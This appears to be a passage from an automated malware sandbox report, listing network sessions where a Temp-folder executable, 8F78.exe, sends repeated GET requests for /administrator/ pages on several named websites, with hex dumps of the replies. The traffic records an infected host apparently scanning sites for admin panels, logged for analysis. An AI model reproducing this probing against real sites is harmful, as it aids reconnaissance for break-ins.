                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 55 60 d8 46 25 5b 87 e5 2b b2 d1 ed ee 16 cd 43 d1 62 93 7d 68 8b 3e 50 12 65 b3 a1 44 95 a2 e3 78 8b fd ef 1d 4a f2 a5 38 0e 62 14 a5 ad 83 9c e1 c7 e1 5c 1c 05 ef 62 11 a9 4d 4e 61 a9 52 3e bf 0a f4 03 38 c9 16 33 83 66 c6 fc 0a 47 28 89 e7 57 80 2d 48 a9 22 10 2d 89 2c a8 9a 19 2b 95 58 63 e3 90 94 91 94 ce 8c 47 46 d7 b9 90 ca 80 48 64 8a 66 c8 ba 66 b1 5a ce 62 fa c8 22 6a 95 1d 13 58 c6 14 23 dc 2a 22 c2 e9 cc 31 a1 58 4a 96 3d 58 4a 58 09 53 b3 4c 9c 80 96 22 14 aa 38 00 ce 04 cb 62 fa 64 42 26 12 c1 b9 58 eb 37 22 a3 25 7b a4 db f9 8a 29 4e e7 9f a4 14 12 06 b6 17 f4 ab 81 8a 58 a8 cd f6 5d 37 bd 7d 73 d7 0b 45 bc 81 7f 76 dd 92 81 b2 c5 52 4d c1 b1 ed d6 cd 11 a5 dc d6 29 42 4a e4 82 65 53 b0 8f 87 73 12 c7 2c 5b 1c 8d 7f db bd 9d 93 21 c1 dd 5b 09 49 19 df 4c c1 22 79 ce a9 55 6c 0a 45 53 13 7e e0 a8 c3 9f 49 74 57 f6 7f 44 4e 13 8c 3b ba 10 14 be dc 1a 26 7c d6 1a 14 26 fc 44 f9 23 55 2c 22 26 bc 97 68 06 54 3f c9 0a ab a0 92 25 38 e3 bd 06 85 0f 82 a3 ce 3e a5 e2 2f 66 1c c0 9c 18 b9 db a4 a1 e0 c6 f1 0e 43 12 3d 2c a4 58 65 b1 15 69 a4 29 2c 0b 4e 3a b6 09 76 cb 2c 15 85 f7 ee 8b 73 58 4a 16 74 0a 92 c4 da 4d 16 fa 89 36 ef 10 05 8e d7 82 c9 04 67 97 78 ae 3f 3e 46 04 3b 47 8f 50 12 37 94 13 89 73 c0 b7 5b 5d f3 14 d2 c8 45 a4 e1 16 c9 73 2f 06 1a 8f 5a 30 f4 b6 40 8e 7b 39 d2 60 d2 02 df df 23 0d 2f 46 f2 9d 16 38 83 9d 9a ec cb 65 d2 0a df 89 e4 0e 2e 07 f2 50 4d ee 68 af 6f 6f 8b 32 70 de 0a e5 e0 ee bc 9d e9 5c d7 37 61 a4 0d e0 ba 6f 45 1a fb 2d 18 8c ff 13 a1 c6 83 96 de e3 db 84 6a e4 05 51 60 62 14 98 30 24 e5 44 61 22 3b 9b 1f 96 4e 23 3b 58 6b 1a 3e 30 65 1d 46 1f 67 f9 14 14 7d 52 37 27 59 35 05 93 2e e7 db 38 3d 90 f0 e5 90 7e 01 f4 22 b0 3a d6 31 79 51 22 f7 1a 45 c7 f3 63 ba 30 e1 3a f6 6c 7b 8c 7e 77 6d 27 ee 60 e8 35 75 56 e5 52 3c 3b 50 24 bb e7 d3 f4 ac ce ae f5 f9 41 70 2d d9 d0 5d 9d c3 3d fb 10 40 b7 5d 0e 07 b2 52 a2 b1 0d f1 64 15 4b 12 8b 35 9a 6c 11 ea 84 84 66 df df ec 5e 65 78 70 ea 4b bf b3 0c cf 50 b3 e2 f7 31 23 ea 6b e2 69 66 d7 af b8 fd 72 8a ad ef 96 5b fa 4d c9 ac b3 67 f5 ef 79 15 a3 a7 6f c3 92 4f bf be a4 e3 29 5c 27 49 72 da 01 42 21 63 2a 2d ad f6 55 31 05 bf 89 62 a5 e2 eb ab 4c af d1 f7 8e 4d c2 42 f0 95 a2 c7 f4 d2 78 7e f3 f4 e4 34 51 27 86 4b a7 4a 84 4c 6b ff c2 48 a1 1d cb d7 51 6b 3d 8f a9 d2 27 09 67 0b 5c 3c 42 c7 a2 f2 ac 7f 7c 9f 52 8c 6c 10 19 df 40 11 49 4a 33 20 59 0c 9d 94 3c 59 b5 8b 0c b4 61 ba 0d f7 79 d1 af 74 ab 27 8e ed d6 11 e9 db 45 82 b0 6c 2f 88 a3 05 69 ca 37 19 fe 1f f2 5d c7 58 9b 31 5e 34 e0 ea c0 bf 9e 24 fa 77 6c 8a b2 78 29 d8 57 aa 03 75 dc 8c b3 5d 51 e4 d0 b4 bc dc ea 79 d6 5c 91 88 e9 a9 12 a9 5a c5 e9 79 af e5 83 65 53 1f b5 2b d7 e9 44 cb 81 0e cb 62 8c 20 5b ff 4e fa 3d d6 55 4a a4 cf ca bc 9a 5a b9 f1 69 9a ac 4a ca 06 b1 4a 39 95 0c ee f3 0d 04 fd ba 74 0d fa 55 85 7e 15 e8 52 b1 2e 6b 63 f6 08 2c 9e 19 3b 83 1b fb 1a 37 58 3a 87 d5 30 f6 f6 a4 7c fe 9b 58 49 3c 79 fe 5e d1 42 c1
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C0WYo6~U`F%[+Cb}h>PeDxJ8b\bMNaR>83fG(W-H"-,+XcGFHdffZb"jX#*"1XJ=XJXSL"8bdB&X7"%{)NX]7}sEvRM)BJeSs,[![IL"yUlES~ItWDN;&|&D#U,"&hT?%8>/fC=,Xei),N:v,sXJtM6gx?>F;GP7s[]Es/Z0@{9`#/F8e.PMhoo2p\7aoE-jQ`b0$Da";N#;Xk>0eFg}R7'Y5.8=~":1yQ"Ec0:l{~wm'`5uVR<;P$Ap-]=@]RdK5lf^expKP1#kifr[MgyoO)\'IrB!c*-U1bLMBx~4Q'KJLkHQk='g\<B|Rl@IJ3 Y<Yayt'El/i7]X1^4$wlx)Wu]Qy\ZyeS+Db [N=UJZiJJ9tU~R.kc,;7X:0|XI<y^B
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.045424938 CET227INData Raw: 92 14 10 6a af 0b b9 88 1e 68 fc 2e e8 e7 87 40 12 fa 07 dd ed a2 b5 53 1c 2c 59 92 8b 94 70 7e 3c a6 db e7 7a ad db 8f 53 08 b4 29 e7 c4 76 5c 27 72 c6 e1 c4 f5 6c 67 32 1a 0e 88 1f 85 f1 90 86 b6 3f 4a 92 61 d0 2f d9 82 f0 68 f9 6d bb 67 29 c2
                                                                                                                                                                                                                                                                                                                                Data Ascii: jh.@S,Yp~<zS)v\'rlg2?Ja/hmg)49,WsYd,2:kt{Jrc=IsN"iMhC`w=E{r}QXW@g(:sI5-}6~v%/N(0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                28192.168.2.45276583.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.520786047 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.772383928 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                29192.168.2.45276283.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.521024942 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.776014090 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                30192.168.2.45276846.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.521420002 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.779926062 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.780987978 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.038346052 CET386INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                31192.168.2.45276383.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.527259111 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.782273054 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                32192.168.2.45276483.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.527282000 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.785557032 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                33192.168.2.45277046.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.528022051 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.784101963 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.785583019 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.042807102 CET386INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                34192.168.2.45276783.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.528552055 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.783489943 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
